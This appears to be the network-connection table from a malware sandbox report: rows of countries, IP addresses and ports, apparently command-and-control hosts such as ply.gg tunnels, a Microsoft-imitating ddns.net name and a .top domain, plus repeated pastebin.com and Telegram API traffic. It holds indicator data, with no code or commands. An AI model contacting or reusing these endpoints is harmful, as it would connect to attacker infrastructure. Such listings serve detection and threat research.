| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 194.164.198.113:8080 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 73.62.14.5:4782 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| GB | 132.145.17.167:9090 | 132.145.17.167 | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | profile-indians.gl.at.ply.gg | udp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 73.62.14.5:4782 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| VN | 14.243.221.170:3322 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 209.38.221.184:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 46.235.26.83:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| NL | 89.110.69.103:80 | 89.110.69.103 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| CN | 150.158.33.10:50003 | tcp | |
| HK | 156.245.12.57:8000 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| VN | 14.243.221.170:3322 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 147.28.185.29:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| NL | 206.166.251.4:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| FR | 51.159.4.50:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| DE | 167.235.70.96:8080 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 194.164.198.113:8080 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| TR | 94.156.177.33:80 | tcp | |
| CN | 112.124.28.233:5566 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 3.70.228.168:555 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GB | 132.145.17.167:9090 | 132.145.17.167 | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| TR | 94.156.177.33:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| CN | 101.200.220.118:8090 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| DE | 209.38.221.184:8080 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
